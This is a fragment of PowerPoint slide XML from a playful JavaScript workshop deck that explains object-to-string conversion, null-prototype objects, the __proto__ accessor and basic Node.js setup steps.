            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// the empty object has no properties, and its prototype is `null`</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>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blobcats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> control all "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> + {} + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>haha</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// calls `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">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blobcats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> control all [object Object] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>haha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>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blobcats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> control all "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>haha</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// no `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>` to call</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Uncaught </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>TypeError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: Cannot convert object to primitive value</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D35400"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-311150" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="92278F"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Lato"/>
              <a:buChar char="●"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-HK" sz="1300" b="0" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="92278F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>“Come back!!!!!!!!!!!!”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" i="1"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5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8494AE4-C295-BD4D-9686-AB4FED02DC64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4804946"/>
            <a:ext cx="6434807" cy="33855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https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object#instance_methods</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="800" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object/toString</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1064083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EE3FF0-1938-BE4B-0454-81B67F34376C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0" err="1"/>
              <a:t>gwwwwawwwwwawaw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0" err="1"/>
              <a:t>wwwwwawa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
              <a:t> *blushes* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0" err="1"/>
              <a:t>wa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
              <a:t> &gt;w&lt;“</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10642BB6-5084-1EEC-1DB6-97ECEB0520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pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="A yellow cat with a black background&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAC4D9AB-E4E7-48D3-B9EA-4B0BEEC5EC12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3173544" y="1173294"/>
            <a:ext cx="2796911" cy="2796911"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2546712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Let’s get ready!</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Get yourself two JavaScript runtimes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Node.js (with NPM): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://nodejs.org/en/download</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> or your choice of package manager</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Run “node” in a terminal after execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Your choice of browser (No browser warring allowed!!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Open the developer console</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Download example files that we will run later</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Navigate to the example folder and run “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0" err="1"/>
              <a:t>npm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> install” to install dependencies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Afterwards, if you want to cleanup, you only need to delete the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0" err="1"/>
              <a:t>node_modules</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>” folder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Python 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>I will tell you why later…</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" sz="13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3712074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[1]</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(If you remember, this thing is mentioned in a slide before)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>While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is a feature that is NOT in the ECMAScript standard, it is present in most JavaScript runtime in almost all situation</a:t>
            </a:r>
          </a:p>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is a property of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 defined by getter and setter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="434F54"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-311150">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="92278F"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Lato"/>
              <a:buChar char="●"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-HK" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="92278F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>This is why </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__proto__</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-HK" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="92278F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t> does not </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-HK" sz="1300" b="0" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="92278F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>store</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-HK" sz="1300" b="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="92278F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t> the</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-HK" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="9B8D8F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>[[Prototype]]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1300" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="434F54"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="434F54"/>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5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8494AE4-C295-BD4D-9686-AB4FED02DC64}"/>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https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object/proto</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{628F8B84-6F42-9E74-9569-8C0EFAB39DEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1549772" y="2827161"/>
            <a:ext cx="6044456" cy="2100895"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="A yellow cat with a thumbs up&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE882DEC-7F6E-ECE6-6E4A-C9C3FAA92F25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8077200" y="393650"/>
            <a:ext cx="1066800" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2031739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[1] 2</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The getter works like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.getPrototypeOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> and the setter works like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.setPrototypeOf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0">
              <a:solidFill>
                <a:srgbClr val="434F54"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="434F54"/>
              </a:solidFill>
              <a:effectLst/>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({}).__proto__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works similar to `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Object.getPrototypeOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">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true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temp = {}</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temp.__proto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__ =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works similar to `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Object.setPrototypeOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">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(temp)</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endParaRPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="434F54"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>While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is a non-standard feature, it is present in almost all JavaScript runtime in almost all situation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="434F54"/>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5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8494AE4-C295-BD4D-9686-AB4FED02DC64}"/>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https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object/proto</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="A cartoon cat face with black background&#10;&#10;Description automatically generated">
